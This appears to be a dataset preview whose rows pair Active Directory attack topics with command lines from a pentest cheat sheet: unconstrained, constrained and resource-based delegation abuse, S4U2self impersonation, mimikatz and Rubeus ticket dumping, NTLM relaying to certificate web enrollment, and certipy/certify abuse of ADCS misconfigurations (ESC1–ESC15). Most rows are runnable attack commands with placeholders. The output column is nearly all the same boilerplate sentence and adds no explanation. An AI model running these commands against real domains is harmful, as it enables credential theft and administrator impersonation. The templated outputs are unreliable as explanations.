instruction stringclasses 270
values | input stringlengths 3 214 | output stringclasses 297
values |
|---|---|---|
Find delegation | MATCH (c:User {unconstraineddelegation:true}) RETURN c | Note or procedural step under 'Find delegation'. |
Find delegation | Constrained | Note or procedural step under 'Find delegation'. |
Find delegation | MATCH p=((c:Base)-[:AllowedToDelegate]->(t:Computer)) RETURN p | Note or procedural step under 'Find delegation'. |
Find delegation | MATCH p=shortestPath((u:User)-[*1..]->(c:Computer {name: "<MYTARGET.FQDN>"})) RETURN p | Note or procedural step under 'Find delegation'. |
Unconstrained delegation | UAC: ADS_UF_TRUSTED_FOR_DELEGATION | Note or procedural step under 'Unconstrained delegation'. |
Unconstrained delegation | Force connection with coerce | Note or procedural step under 'Unconstrained delegation'. |
Unconstrained delegation | Get tickets | Note or procedural step under 'Unconstrained delegation'. |
Unconstrained delegation | mimikatz privilege::debug sekurlsa::tickets /export sekurlsa::tickets /export | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Unconstrained delegation | Rubeus.exe dump /service:krbtgt /nowrap | Tool or command referenced under 'Unconstrained delegation'. |
Unconstrained delegation | Rubeus.exe dump /luid:0xdeadbeef /nowrap | Tool or command referenced under 'Unconstrained delegation'. |
Unconstrained delegation | Rubeus.exe monitor /interval:5 | Tool or command referenced under 'Unconstrained delegation'. |
Constrained delegation | With protocol transition (any) UAC: TRUST_TO_AUTH_FOR_DELEGATION | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | Get TGT for user | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | Request S4u2self | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | Request S4u2proxy | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | Rubeus.exe hash /password:<password> | Tool or command referenced under 'Constrained delegation'. |
Constrained delegation | Rubeus.exe asktgt /user:<user> /domain:<domain> /aes256:<AES 256 hash> | Tool or command referenced under 'Constrained delegation'. |
Constrained delegation | Rubeus.exe s4u /ticket:<ticket> /impersonateuser:<admin_user> /msdsspn:<spn_constrained> /altservice:<altservice> /ptt | Tool or command referenced under 'Constrained delegation'. |
Constrained delegation | Altservice HTTP/HOST/CIFS/LDAP | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | getST.py -spn '<spn>/<target>' -impersonate Administrator -dc-ip '<dc_ip>' '<domain>/<user>:<password>' -altservice <altservice> | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | Altservice HTTP/HOST/CIFS/LDAP | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | Without protocol transition (kerberos only) UAC: TRUSTED_FOR_DELEGATION | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | Constrain between Y and Z | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | Add computer X | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | Add RBCD : delegate from X to Y | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | s4u2self X (impersonate admin) | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | S4u2Proxy X (impersonate admin on spn/Y) | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | Forwardable TGS for Y | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | S4u2Proxy Y (impersonate admin on spn/Z) | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | add computer account | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | addcomputer.py -computer-name '<computer_name>' -computer-pass '<ComputerPassword>' -dc-host <dc> -domain-netbios <domain_netbios> '<domain>/<user>:<password>' | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | RBCD With added computer account | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | rbcd.py -delegate-from '<rbcd_con>$' -delegate-to '<constrained>$' -dc-ip '<dc>' -action 'write' -hashes '<hash>' <domain>/<constrained>$ | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | getST.py -spn host/<constrained> -impersonate Administrator --dc-ip <dc_ip> '<domain>/<rbcd_con>$:<rbcd_conpass>' | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | getST.py -spn <constrained_spn>/<target> -hashes '<hash>' '<domain>/<constrained>$' -impersonate Administrator --dc-ip <dc_ip> -additional-ticket <previous_ticket> | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | Self RBCD | Note or procedural step under 'Constrained delegation'. |
Constrained delegation | Like RBCD without add computer | Note or procedural step under 'Constrained delegation'. |
Resource-Based Constrained Delegation | add computer account | Note or procedural step under 'Resource-Based Constrained Delegation'. |
Resource-Based Constrained Delegation | addcomputer.py -computer-name '<computer_name>' -computer-pass '<ComputerPassword>' -dc-host <dc> -domain-netbios <domain_netbios> '<domain>/<user>:<password>' | Note or procedural step under 'Resource-Based Constrained Delegation'. |
Resource-Based Constrained Delegation | RBCD With added computer account | Note or procedural step under 'Resource-Based Constrained Delegation'. |
Resource-Based Constrained Delegation | Rubeus.exe hash /password:<computer_pass> /user:<computer> /domain:<domain> | Tool or command referenced under 'Resource-Based Constrained Delegation'. |
Resource-Based Constrained Delegation | Rubeus.exe s4u /user:<fake_computer$> /aes256:<AES 256 hash> /impersonateuser:administrator /msdsspn:cifs/<victim.domain.local> /altservice:krbtgt,cifs,host,http,winrm,RPCSS,wsman,ldap /domain:domain.local /ptt | Tool or command referenced under 'Resource-Based Constrained Delegation'. |
Resource-Based Constrained Delegation | rbcd.py -delegate-from '<computer>$' -delegate-to '<target>$' -dc-ip '<dc>' -action 'write' <domain>/<user>:<password> | Note or procedural step under 'Resource-Based Constrained Delegation'. |
Resource-Based Constrained Delegation | getST.py -spn host/<dc_fqdn> '<domain>/<computer_account>:<computer_pass>' -impersonate Administrator --dc-ip <dc_ip> #Kerberos TGT | Note or procedural step under 'Resource-Based Constrained Delegation'. |
S4U2self abuse | Get machine account (X)'s TGT | Note or procedural step under 'S4U2self abuse'. |
S4U2self abuse | Get a ST on X as user admin | Note or procedural step under 'S4U2self abuse'. |
S4U2self abuse | getTGT.py -dc-ip "<dc_ip>" -hashes :"<machine_hash>" "<domain>"/"<machine>$" | Note or procedural step under 'S4U2self abuse'. |
S4U2self abuse | getST.py -self -impersonate "<admin>" -altservice "cifs/<machine>" -k -no-pass -dc-ip "DomainController" "<domain>"/'<machine>$' #Admin | Note or procedural step under 'S4U2self abuse'. |
Enumeration | certutil -v -dsTemplate | Note or procedural step under 'Enumeration'. |
Enumeration | certify.exe find [ /vulnerable] | Note or procedural step under 'Enumeration'. |
Enumeration | certipy find -u <user>@<domain> -p <password> -dc-ip <dc_ip> | Note or procedural step under 'Enumeration'. |
Enumeration | ldeep ldap -u <user> -p <password> -d <domain> -s <dc_ip> templates | Note or procedural step under 'Enumeration'. |
Enumeration | Get PKI objects information | Note or procedural step under 'Enumeration'. |
Enumeration | certify.exe pkiobjects | Note or procedural step under 'Enumeration'. |
Enumeration | Display CA information | Note or procedural step under 'Enumeration'. |
Enumeration | certutil -TCAInfo | Note or procedural step under 'Enumeration'. |
Enumeration | certify.exe cas | Note or procedural step under 'Enumeration'. |
Web Enrollment Is Up | ESC8 | Note or procedural step under 'Web Enrollment Is Up'. |
Web Enrollment Is Up | ntlmrelayx.py -t http://<dc_ip>/certsrv/certfnsh.asp -debug -smb2support --adcs --template DomainController | Note or procedural step under 'Web Enrollment Is Up'. |
Web Enrollment Is Up | Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt | Tool or command referenced under 'Web Enrollment Is Up'. |
Web Enrollment Is Up | gettgtpkinit.py -pfx-base64 $(cat cert.b64) <domain>/<dc_name>$ <ccache_file> | Note or procedural step under 'Web Enrollment Is Up'. |
Web Enrollment Is Up | certipy relay -target http://<ip_ca> | Note or procedural step under 'Web Enrollment Is Up'. |
Web Enrollment Is Up | certipy auth -pfx <certificate> -dc-ip <dc_ip> | Note or procedural step under 'Web Enrollment Is Up'. |
Misconfigured Certificate Template | ESC1 | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | certipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<vulnerable template name>' -ca <ca_name> -upn <target_user>@<domain> | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | certify.exe request /ca:<server>\<ca-name> /template:"<vulnerable template name>" [/altname:"Admin"] | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | ESC2 | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | ESC3 | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | ESC3 | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | certify.exe request /ca:<server>\<ca-name> /template:"<vulnerable template name>" | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | certify.exe request request /ca:<server>\<ca-name> /template:<template> /onbehalfof:<domain>\<user> /enrollcert:<path.pfx> [/enrollcertpw:<cert-password>] | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | certipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<vulnerable template name>' -ca <ca_name> | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | certipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<vulnerable template name>' -ca <ca_name> | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | ESC13 | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | certipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<vulnerable template name>' -ca <ca_name> | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | certify.exe request /ca:<server>\<ca-name> /template:"<vulnerable template name>" | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | ESC15 | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | certipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<version 1 template with enrolee flag>' -ca <ca_name> -upn <target_user>@<domain> --application-policies 'Client Authentication' #[PR 228] | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | certipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<version 1 template with enrolee flag>' -ca <ca_name> --application-policies 'Certificate Request Agent' # [PR 228] | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured Certificate Template | certipy req -u <user>@<domain> -p <password> -target <ca_server> -template '<vulnerable template name>' -ca <ca_name> -on-behalf-of '<domain>\<user>' -pfx <cert> | Note or procedural step under 'Misconfigured Certificate Template'. |
Misconfigured ACL | ESC4 | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | write privilege over a certificate template | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | certipy template -u <user>@<domain> -p '<password>' -template <vuln_template> -save-old -debug | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | ESC1 | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | restore template | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | certipy template -u <user>@<domain> -p '<password>' -template <vuln_template> -configuration <template>.json | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | ESC7 | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | Manage CA | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | certipy ca -ca <ca_name> -add-officer '<user>' -username <user>@<domain> -password <password> -dc-ip <dc_ip> -target-ip <target_ip> | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | ESC7 Manage certificate | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | Manage certificate | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | certipy ca -ca <ca_name> -enable-template '<ecs1_vuln_template>' -username <user>@<domain> -password <password> | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | certipy req -username <user>@<domain> -password <password> -ca <ca_name> -template '<vulnerable template name>' -upn '<target_user> | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | error, but save private key and get issue request | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | Issue request | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | certipy ca -u <user>@<domain> -p '<password>' -ca <ca_name> -issue-request <request_id> | Note or procedural step under 'Misconfigured ACL'. |
Misconfigured ACL | certipy req -u <user>@<domain> -p '<password>' -ca <ca_name> -retreive <request_id> #Pass the certificate | Note or procedural step under 'Misconfigured ACL'. |
Vulnerable PKI Object access control | ESC5 | Note or procedural step under 'Vulnerable PKI Object access control'. |
Vulnerable PKI Object access control | Vulnerable acl on PKI | Note or procedural step under 'Vulnerable PKI Object access control'. |
Vulnerable PKI Object access control | ACL | Note or procedural step under 'Vulnerable PKI Object access control'. |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.